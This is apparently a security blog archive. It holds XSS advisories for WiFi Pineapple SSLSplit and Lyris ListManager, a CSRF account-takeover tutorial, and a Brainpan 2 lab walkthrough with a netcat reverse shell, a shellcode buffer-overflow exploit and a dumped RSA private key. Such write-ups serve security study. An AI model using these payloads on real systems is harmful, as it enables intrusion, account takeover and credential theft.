Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts
Thursday, January 15, 2015
Tuesday, December 30, 2014
WiFi Pineapple MK5 / SSLSplit v1.1 Cross-Site Scripting (Stored)
Vendor: Hak5
Website: http://www.hak5.com
Hardware: Wifi Pineapple MK5
Software: SSLSplit
Version: 1.1
Author: 1N3
I'm releasing this info purely for educational purposes. There appears to be a stored Cross-Site Scripting vulnerability in the SSLSplit v.1.1 infusion for the Pineapple MK5. This could be used by a rogue wifi user to invoke a Cross-Site Scripting vulnerability on the owner of the Pineapple wifi device when viewing the SSLSplit logs.
Reproduction Steps:
1. Attacker sets up a RogueAP using PineappleV with SSLSplit running
2. A Wifi user connects to the PinappleV RogueAP setup
3. Wifi user then creates an image on his webserver with meta tags embedded with the following string: "></script>">'><img src=x onerror=confirm(4)>
4. Wifi user opens a web browser and navigates to the affected image they just created
5. Attacker then tries to download his logs via the SSLSplit web UI (SSLSplit > History > Click "Download" for the affected log file)
Result:
Alert window message is displayed to attacker
Website: http://www.hak5.com
Hardware: Wifi Pineapple MK5
Software: SSLSplit
Version: 1.1
Author: 1N3
I'm releasing this info purely for educational purposes. There appears to be a stored Cross-Site Scripting vulnerability in the SSLSplit v.1.1 infusion for the Pineapple MK5. This could be used by a rogue wifi user to invoke a Cross-Site Scripting vulnerability on the owner of the Pineapple wifi device when viewing the SSLSplit logs.
Reproduction Steps:
1. Attacker sets up a RogueAP using PineappleV with SSLSplit running
2. A Wifi user connects to the PinappleV RogueAP setup
3. Wifi user then creates an image on his webserver with meta tags embedded with the following string: "></script>">'><img src=x onerror=confirm(4)>
4. Wifi user opens a web browser and navigates to the affected image they just created
5. Attacker then tries to download his logs via the SSLSplit web UI (SSLSplit > History > Click "Download" for the affected log file)
Result:
Alert window message is displayed to attacker
Saturday, October 25, 2014
Update Users Password and Email Address Using CSRF
During a recent bug bounty/pentest, I discovered a Cross Site Request Forgery vulnerability that allowed me to automatically update a users email address, password, credit card info, shipping address and more. This is a brief tutorial on how it was done.
What is Cross Site Request Forgery?
In short, cross site request forgery allows an attacker to do certain actions on behalf of valid users (such as updating a user's password).
Step 1: Find a form on the target website that you want to test. In the example below, it was /AccountSettings.asp.
Step 2: Intercept the POST request using Burpsuite or any other proxy. Notice below the POST values being submitted include the users password, email, CC data, etc.
POST /AccountSettings.asp HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140924 Firefox/24.0 Iceweasel/24.8.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: www.vulnerabletocsrf.com/AccountSettings.asp?modwhat=change_a
Cookie: vsettings=; ASPSESSIONIDCACRBAAC=AOJMIBNBPHKJKPDJBHMNMGHH; ASP.NET_SessionId=sdrlj3454lpqi4zacpnkami3; __atuvc=6%7C42; CartID5=64D7287A97204E7C821621BE7A6174C4; Referrer=www%2Exerosecurity%2Ecom; AffiliateID=; AffiliateTrackedToday=; ASPSESSIONIDCCCQCCDB=CDCPFKHCDEOJKEPKDMIFDPPM; slt=ABEC051D-1B66-494C-BD3F-54D38B3A49AD; CustomerID=2380CC3CAA66AF2AC5C9EA2ABEC9B68BE51956AFBCC2F1A26E858B323D260F9E
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 279
Host: www.vulnerabletocsrf.com
modwhat=change_a&BillingID=&ShipID=&CCardID=&OrderPlaced=&ReturnTo=&Email=test123456%40mailinator.com&AddNewCustomer=&Emailagain=test123456%40mailinator.com&password=&passwordagain=&emailsubscriber=Y&btnContinue.x=35&btnContinue.y=16&NewSignup=&CustomerID=&Anonymous=&DirectLink=
Step 3: Recreate the original POST form on your own web server. To do this, you will need to check all form field data and HTML being passed by the target website. You can do this by viewing the source code of the target website where the POST form is found. Be sure to update the POST action="" section of the form to the target URL ie. http://www.vulnerabletocsrf.com/AccountSettings.asp. You also need to update the values of each form field to the values you want to change (ie. email address, password, CC number, etc..).
What is Cross Site Request Forgery?
In short, cross site request forgery allows an attacker to do certain actions on behalf of valid users (such as updating a user's password).
Step 1: Find a form on the target website that you want to test. In the example below, it was /AccountSettings.asp.
Step 2: Intercept the POST request using Burpsuite or any other proxy. Notice below the POST values being submitted include the users password, email, CC data, etc.
POST /AccountSettings.asp HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140924 Firefox/24.0 Iceweasel/24.8.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: www.vulnerabletocsrf.com/AccountSettings.asp?modwhat=change_a
Cookie: vsettings=; ASPSESSIONIDCACRBAAC=AOJMIBNBPHKJKPDJBHMNMGHH; ASP.NET_SessionId=sdrlj3454lpqi4zacpnkami3; __atuvc=6%7C42; CartID5=64D7287A97204E7C821621BE7A6174C4; Referrer=www%2Exerosecurity%2Ecom; AffiliateID=; AffiliateTrackedToday=; ASPSESSIONIDCCCQCCDB=CDCPFKHCDEOJKEPKDMIFDPPM; slt=ABEC051D-1B66-494C-BD3F-54D38B3A49AD; CustomerID=2380CC3CAA66AF2AC5C9EA2ABEC9B68BE51956AFBCC2F1A26E858B323D260F9E
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 279
Host: www.vulnerabletocsrf.com
modwhat=change_a&BillingID=&ShipID=&CCardID=&OrderPlaced=&ReturnTo=&Email=test123456%40mailinator.com&AddNewCustomer=&Emailagain=test123456%40mailinator.com&password=&passwordagain=&emailsubscriber=Y&btnContinue.x=35&btnContinue.y=16&NewSignup=&CustomerID=&Anonymous=&DirectLink=
Step 3: Recreate the original POST form on your own web server. To do this, you will need to check all form field data and HTML being passed by the target website. You can do this by viewing the source code of the target website where the POST form is found. Be sure to update the POST action="" section of the form to the target URL ie. http://www.vulnerabletocsrf.com/AccountSettings.asp. You also need to update the values of each form field to the values you want to change (ie. email address, password, CC number, etc..).
NOTE: You can also include Javascript to automatically submit the form as soon as a user views the page via document.forms["f1"].submit(); as seen above.
STEP 4: Now that we have our new CSRF form sitting on our web server, we can send this page to users of the site to entice them to click on our link (ie. http://evilattacker.com/test.html). If the site is vulnerable to CSRF, the form fields that we edited will be automatically submitted on the user's behalf and updated. It should also be noted that this can all be done via a hidden <iframe> in any website the user visits as well.
DISCLAIMER: This is merely for educational purposes to teach more about the dangers of CSRF and improve security.
Thursday, July 31, 2014
Lyris ListManagerWeb 8.95a Reflective XSS
Author: 1N3
Website: http://xerosecurity.com
Vender Website: http://lyris.com/us-en/products/listmanager
Affected Product: Lyris ListManagerWeb
Affected Version: 8.95a
ABOUT:
Lyris ListManager (Lyris LM) is an on-premises email marketing software for companies that require the ability to deploy high-volume email programs behind a firewall. Version 8.95a suffers from a cross site scripting (XSS) vulnerability in the “doemailpassword.tml” page because it fails to properly sanitize the “EmailAddr” POST variable.
POC:
POST http://host.com/doemailpassword.tml HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://host.com/emailpassword.tml
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Proxy-Connection: Keep-Alive
Host: host.com
EmailAddr=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E
Website: http://xerosecurity.com
Vender Website: http://lyris.com/us-en/products/listmanager
Affected Product: Lyris ListManagerWeb
Affected Version: 8.95a
ABOUT:
Lyris ListManager (Lyris LM) is an on-premises email marketing software for companies that require the ability to deploy high-volume email programs behind a firewall. Version 8.95a suffers from a cross site scripting (XSS) vulnerability in the “doemailpassword.tml” page because it fails to properly sanitize the “EmailAddr” POST variable.
POC:
POST http://host.com/doemailpassword.tml HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140610 Firefox/24.0 Iceweasel/24.6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://host.com/emailpassword.tml
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Proxy-Connection: Keep-Alive
Host: host.com
EmailAddr=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E
Sunday, March 16, 2014
Brainpan 2 Pentest VM Solution
# OVERVIEW
Brainpan 2 is a test VM solution used for Pentesting/Hacking simulations. For more info, go to http://blog.techorganic.com. This walk through covers the basic steps to obtain "root" access to Brainpan 2.
# DISCOVER BRAINPAN2 HOST
root@bt:/mnt/sdb/# netdiscover -r 192.168.1.0/24 -i eth2
Currently scanning: Finished! | Screen View: Unique Hosts
7 Captured ARP Req/Rep packets, from 7 hosts. Total size: 420
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.120 00:0c:29:5f:9b:12 01 060 VMware, Inc.
# PORT SCAN
root@bt:/mnt/sdb/# nmap -sV 192.168.1.120
################################### Running port scan ##############################
Starting Nmap 6.25 ( http://nmap.org ) at 2014-03-15 21:26 EDT
Nmap scan report for 192.168.1.120
Host is up (0.00024s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.25%I=7%D=3/15%Time=5324FDCD%P=i686-pc-linux-gnu%r(NULL
SF:,296,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
# BRUTE FORCE WEB FILES
root@bt:/mnt/sdb/# dirbuster &
http://192.168.1.120:10000
Starting OWASP DirBuster 0.12
Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /bin/ - 200
Dir found: // - 200
ERROR: http://192.168.1.120/bin/brainpan.exe - IOException Connection refused
# CONNECT TO BRAINPAN2
root@bt:/mnt/sdb/# nc 192.168.1.120 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[______________________ WELCOME TO BRAINPAN 2.0________________________]
LOGIN AS GUEST
>> GUEST
ACCESS GRANTED
* * * *
THIS APPLICATION IS WORK IN PROGRESS. GUEST ACCESS IS RESTRICTED.
TYPE "TELL ME MORE" FOR A LIST OF COMMANDS.
* * * *
>> TELL ME MORE
FILES HELP VIEW CREATE
USERS MSG SYSTEM BYE
>> HELP
BRAINPAN(7) 2.0 BRAINPAN(7)
NAME
brainpan - Server side collaboration system.
DESCRIPTION
The brainpan server is a collaboration system that allows users to
share and update files on the fly. While the server is work in
progress, several features are functional. GUEST users have limited
access to the available commands.
COMMANDS
HELP Display the the brainpan manual.
TELL ME MORE Show a list of available commands.
FILES Show files currently stored on the server.
VIEW View a file stored on the server.
CREATE Create a file on the server.
USERS Display a list of users currently logged in.
MSG Send a message to a user.
SYSTEM Report system information.
BYE Log out of the server.
AUTHENTICATION
There is currently no proper authentication mechanism in place. At this
time the software is in it's alpha stage. The only avaiable account is
GUEST. The DEBUG account will alter the output of some commands - use‐
ful for developers.
AUTHOR
superkojiman - http://www.techorganic.com
version http://www.techorganic.com BRAINPAN(7)
>> BYE
# LOGIN AS DEBUG USER
root@bt:/mnt/sdb/# nc 192.168.1.120 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[______________________ WELCOME TO BRAINPAN 2.0________________________]
LOGIN AS GUEST
>> DEBUG
ACCESS GRANTED
* * * *
THIS APPLICATION IS WORK IN PROGRESS. GUEST ACCESS IS RESTRICTED.
TYPE "TELL ME MORE" FOR A LIST OF COMMANDS.
* * * *
>> TELL ME MORE
FILES HELP VIEW CREATE
USERS MSG SYSTEM BYE
# BRAINPAN 2 COMMAND INJECTION VULNERABILITY IN VIEW COMMAND
>> VIEW
ENTER FILE TO DOWNLOAD: |whoami
anansi
# START REVERSE NETCAT SHELL
>> VIEW
ENTER FILE TO DOWNLOAD: |nc 192.168.1.112 443 -e /bin/bash
# START REVERSE NETCAT LISTENER
root@bt:~/.ssh# nc -lvvp 443
listening on [any] 443 ...
192.168.1.120: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.112] from (UNKNOWN) [192.168.1.120] 51601
whoami
anansi
pwd
/opt/brainpan
ls
brainpan.exe
brainpan.txt
notes.txt
# BREAK OUT OF LIMITED SHELL
python -c 'import pty;pty.spawn("/bin/bash")'
anansi@brainpan2:/opt/brainpan$
# SEARCH FOR SUID OR GUID files
-rwxr-sr-x 1 root shadow 30K May 4 2012 /sbin/unix_chkpwd
-rwsr-xr-x 1 puck puck 18K Nov 4 14:37 /opt/old/brainpan-1.8/brainpan-1.8.exe
-rwsr-xr-x 1 root root 916K Jan 2 2013 /usr/sbin/exim4
-rwsr-xr-x 1 root root 44K May 25 2012 /usr/bin/chfn
-rwxr-sr-x 1 root tty 18K Dec 9 2012 /usr/bin/wall
-rwsr-xr-x 1 root root 45K May 25 2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 36K May 25 2012 /usr/bin/chsh
-rwxr-sr-x 1 root ssh 126K Feb 8 2013 /usr/bin/ssh-agent
-rwxr-sr-x 1 root crontab 34K Jul 3 2012 /usr/bin/crontab
-rwsr-sr-x 1 root mail 82K Jun 6 2012 /usr/bin/procmail
-rwxr-sr-x 1 root mail 18K Jun 6 2012 /usr/bin/lockfile
-rwsr-xr-x 1 root root 65K May 25 2012 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 46K Jun 9 2012 /usr/bin/at
-rwxr-sr-x 1 root tty 9.5K Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9.6K Oct 2 17:15 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root shadow 18K May 25 2012 /usr/bin/expiry
-rwsr-xr-x 1 root root 31K May 25 2012 /usr/bin/newgrp
-rwxr-sr-x 1 root mlocate 30K Sep 25 2010 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 14K Dec 11 2012 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 49K May 25 2012 /usr/bin/chage
-rwsr-xr-x 1 root root 9.5K Dec 30 2012 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 243K Feb 8 2013 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5.3K Dec 23 2012 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 67K Dec 9 2012 /bin/umount
-rwsr-xr-x 1 root root 31K Apr 12 2011 /bin/ping
-rwsr-xr-x 1 root root 87K Dec 9 2012 /bin/mount
-rwsr-xr-x 1 root root 35K Apr 12 2011 /bin/ping6
-rwsr-xr-x 1 root root 35K May 25 2012 /bin/su
-rwsr-xr-x 1 root root 8.8K Nov 6 17:10 /home/reynard/msg_root
# FUZZING MSG_ROOT SUID ROOT PROGRAM
# Since msg_root is SUID, if we can find an overflow in the program, we can use that to execute code with "root" privileges. Testing the code shows that the program uses 2 arguments (username) and (message). We can fuzz both of these with large arbitrary buffers to check for overflows...
anansi@brainpan2:/opt/brainpan$ cd /home/reynard
cd /home/reynard
anansi@brainpan2:/home/reynard$ ls
ls
msg_root readme.txt startweb.sh web
anansi@brainpan2:/home/reynard$ cat readme.txt
cat readme.txt
msg_root is a quick way to send a message to the root user.
Messages are written to /tmp/msg.txt
usage:
msg_root "username" "this message is for root"
# OVERFLOW CONFIRMED
anansi@brainpan2:/home/reynard$ gdb -q ./msg_root
(gdb) r `perl -e 'print "A"x100'` BBBB
r `perl -e 'print "A"x100'` BBBB
Starting program: /home/reynard/msg_root `perl -e 'print "A"x100'` BBBB
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
# CREATE UNIQUE PATTERN WITH PATTERN_CREATE.RB
msf > ruby pattern_create.rb 100
[*] exec: ruby pattern_create.rb 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
# RUN GDB ON MSG_ROOT REPLACING ORIGINAL BUFFER WITH UNIQUE PATTERN TO FIND OFFSET
msf > ruby pattern_offset.rb 0x35614134
[*] exec: ruby pattern_offset.rb 0x35614134
[*] Exact match at offset 14
# 14 BYTES TO OVERWRITE EIP
# CONEPTUAL BUFFER
BUFFER (100) = [JUNK (14) + EIP (4) + BUFFER (82)]
(gdb) r `perl -e 'print "A"x14,"BBBB"'` CCCC
r `perl -e 'print "A"x14,"BBBB"'` CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
y
Starting program: /home/reynard/msg_root `perl -e 'print "A"x14,"BBBB"'` CCCC
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)
# EIP is overwritten with B's as expected (ie. we control EIP). Now we need to generate our shellcode...
# GENERATING OUR SHELLCODE
msf > msfvenom -p linux/x86/exec CMD=/bin/sh -b "x00x0axff" -f c
[*] exec: msfvenom -p linux/x86/exec CMD=/bin/sh -b "x00x0axff" -f c
[*] x86/shikata_ga_nai succeeded with size 70 (iteration=1)
unsigned char buf[] =
"\xda\xc3\xd9\x74\x24\xf4\xbb\x15\x2b\x13\x7a\x58\x29\xc9\xb1"
"\x0b\x83\xe8\xfc\x31\x58\x16\x03\x58\x16\xe2\xe0\x41\x18\x22"
"\x93\xc4\x78\xba\x8e\x8b\x0d\xdd\xb8\x64\x7d\x4a\x38\x13\xae"
"\xe8\x51\x8d\x39\x0f\xf3\xb9\x32\xd0\xf3\x39\x6c\xb2\x9a\x57"
"\x5d\x41\x34\xa8\xf6\xf6\x4d\x49\x35\x78";
# NEW CONCEPTUAL BUFFER
BUFFER (100) = [JUNK (14) + EIP (4) + NOOPS (12) + SHELLCODE (70)]
# Now we need to know where to point our new EIP to execute our shellcode. To do this, we can compile and run 2 C programs to tell us the right address to jump to for our shellcode (eggcode.c and findeggaddr.c). I compiled both of them locally on my system and transferred to target system using wget.
anansi@brainpan2:/tmp$ ./eggcode
Eggshell loaded into environment.
anansi@brainpan2:/tmp$ ./findeggaddr
./findeggaddr
EGG address: 0xbffffd74
anansi@brainpan2:/tmp$
# LITTLE ENDIAN
\x74\xfd\xff\xbf
# EXPLOITING MSG_ROOT
anansi@brainpan2:/home/reynard$ ./msg_root `perl -e 'print "A"x14,"\x74\xfd\xff\xbf","\x90"x12,"\xda\xc3\xd9\x74\x24\xf4\xbb\x15\x2b\x13\x7a\x58\x29\xc9\xb1\x0b\x83\xe8\xfc\x31\x58\x16\x03\x58\x16\xe2\xe0\x41\x18\x22\x93\xc4\x78\xba\x8e\x8b\x0d\xdd\xb8\x64\x7d\x4a\x38\x13\xae\xe8\x51\x8d\x39\x0f\xf3\xb9\x32\xd0\xf3\x39\x6c\xb2\x9a\x57\x5d\x41\x34\xa8\xf6\xf6\x4d\x49\x35\x78"'` test
<xf3\x39\x6c\xb2\x9a\x57\x5d\x41\x34\xa8\xf6\xf6\x4d\x49\x35\x78"'` test
AhmadUUMUni
$ whoami
whoami
root
root@brainpan2:/# cd /root/
root@brainpan2:/root# cat whatif.txt
WHAT IF I TOLD YOU
___
/ \
| ______\
(, \_/ \_/
| ._. |
\ --- /
/`-.__.'
.---'`-.___|\___
/ `.
YOU ARE NOT ROOT?
# CHECKING USERS, UID 0 APPEARS TO BE RENAMED TO "root "... UGH! The test continues...
root@brainpan2:/root# cat /etc/passwd
root:x:104:106:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
root :x:0:0:root:/var/root:/bin/bash
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
anansi:x:1000:1000:anansi,,,:/home/anansi:/bin/bash
puck:x:1001:1001:puck,,,:/home/puck:/bin/bash
reynard:x:1002:1002:reynard,,,:/home/reynard:/bin/bash
# Since there were 2 obvious SUID programs running on the system, I decided to try and exploit the other which was owned by 'puck'...
-rwsr-xr-x 1 puck puck 18K Nov 4 14:37 /opt/old/brainpan-1.8/brainpan-1.8.exe
$ cd /opt/old
cd /opt/old
$ ls
ls
brainpan-1.8
$ cd brainpan-1.8
cd brainpan-1.8
$ ls
ls
brainpan-1.8.exe brainpan.7 brainpan.cfg
$ ls -lh
ls -lh
total 28K
-rwsr-xr-x 1 puck puck 18K Nov 4 14:37 brainpan-1.8.exe
-rw-r--r-- 1 puck puck 1.2K Nov 5 09:24 brainpan.7
-rw-rw-rw- 1 puck staff 27 Nov 5 09:25 brainpan.cfg
# WEAK PERMISSIONS ON BRAINPAN.CFG SO I DECIDED TO ALTER THE VALUES TO MAKE THE PROGRAM ACCESSIBLE FROM THE EXTERNAL IP...
$ echo "port=9333" > brainpan.cfg
echo "port=9333" > brainpan.cfg
$ echo "ipaddr=192.168.1.122" >> brainpan.cfg
echo "ipaddr=192.168.1.122" >> brainpan.cfg
$ ./brainpan-1.8.exe &
./brainpan-1.8.exe &
$ port = 9333
ipaddr = 192.168.1.122
+ bind done
+ waiting for connections...
# CONNECTING TO BRAINPAN 1.8
root@bt:/var/www/tmp/tools/debug# nc 192.168.1.122 9333
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[______________________ WELCOME TO BRAINPAN 1.8________________________]
LOGIN AS GUEST
>> GUEST
ACCESS GRANTED
* * * *
THIS APPLICATION IS WORK IN PROGRESS. GUEST ACCESS IS RESTRICTED.
TYPE "TELL ME MORE" FOR A LIST OF COMMANDS.
* * * *
>> VIEW
ENTER FILE TO DOWNLOAD: /etc/passwd | whoami
puck
# DOWNLOADING PUCKS PRIVATE SSH KEYS...
>> VIEW
ENTER FILE TO DOWNLOAD: file | cat /home/puck/.backup/.ssh/*
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA1+CFCKF8MKX5rED7Yjf+qqVVSYswPeKaNxtk/hcKLmuS0s/X
EWAELLV+Cvg7eQDGSm1n209t7BZ133jGSehKkPkJeSVFKsCv4ACUeYuqTsBluF0V
Fcl6ZbnwzkIJYj3GH8YPlRlv/6r8CfJPjtqvwnRBaAZWxjGhyzPm4TWJs6xwK0ri
dnjiI8TkQ0GJiY4ptr3dBvvMNlt1Kvxe6WZFtkA/9nc8LO5FE7zIZR7mVMhO7qPl
qave0ZWw9QHdzdY8OwrkK25zprLAqMAqy4DGrasOYMCw8R2vHijbNGnqd8uFGu1v
hYyPYX++dC3n8JssJgQRFFKA3gNbMYCySZMnUQIDAQABAoIBAE5C8Be763j7gvNG
r5vg7utQewXpdvjIgN3/iXJwSdmgWB8jCDYdWAYZWfOCIJVyiXCMDz27ov8W+W6l
q0U5+GZsUlngAB5KsrgDndAeqQRZzcazwCQg4cWlTj6IRDygZoY4WIfWK/tFMpAs
j1kbwOI/IUMkIStC7QPs8gOtVBmVfFKxrF1Le5mY7b32ETj/0Knebp7naLF64lnn
LSQUqUFohMCiSmQk5zG/e+6f0ZG0qWQw+XNsyGigVAJ0gNC/+5OxQV0h517oPFW6
OwwevwJkwZnZbUfn6T8Hyaa8UtinNDVTgb2s+pGHxGD6g1neClacDd67vZP5IwsQ
zdZagd0CgYEA+2nfv28sem/+M8JWSm70xJVL4okH569/bWHcp/7iPloDtReEECrR
WGPMvwh6q2wh0hU1kWvUSt+fC21AgPlu0jnHdkxK9gyYLSp8cmQuk/c6IEI3Jsk8
aqF2pihaSuZdBPbWgre/EXIKXVoQpIH3QKLUNdA9C71PnuvDGpC6TOcCgYEA29Cv
wCMcKsqEI+dQhHjFZzlwmBIeF2VoeMiv7MFbnpAvPprR6N2KOJxXdQivvE8rskBL
buIthSAVLPvDRFBswUCkmKeJlnuwy/QzOfeyGpCPKhtxz+BX83XzYISfCpAQDLGA
fxTdrxW3aJ1le9hkMfkaUrqqV1wg5/veqWml6wcCgYBpevoM7y/SDrqwLJDXmcXH
1HuKB8PxSIhF9BEHysBROKLlj4Aw6EX8t6JnY79TvIJUCeH3qS3gXAH2YVf2xK/i
M6ujzk6E/LO7/19G/xErs0YH0sAg3b0jX6rP+44mbpAITSeioEThpN8EW40v9/cs
fyRZj4yNKFgHbRLmSmJfcQKBgFl2gOExKPidfdRjA5k20hjl/tZVoVuiUTe/biJs
u844HpJbTo15BRVvRAUE6Qk6K62bj1fsw9wHp7asLNfz559roNHkdhIB+322wNaZ
4in/pdTcYKDbTNBwtAIXV+djpLSV1ZdjNapZq1DvpmsWMglIuhbrlAKEI3xnPUM0
FWwnAoGBAOniWAvJMvrIAeYjjFsdU7w9KSY/PG/0dVFELikt800DRMMYZ+I+z8sL
GWceTsJpJHVIgC+BBvt8jCLf2bmdZs1W7w/W459+FYAxB21aUELPblQRfuBsEjHs
nKXuwj5sY94uQfoX8TWdP5ETp78DAcacxplt2s8EI3NmX2UpqFf9
-----END RSA PRIVATE KEY-----
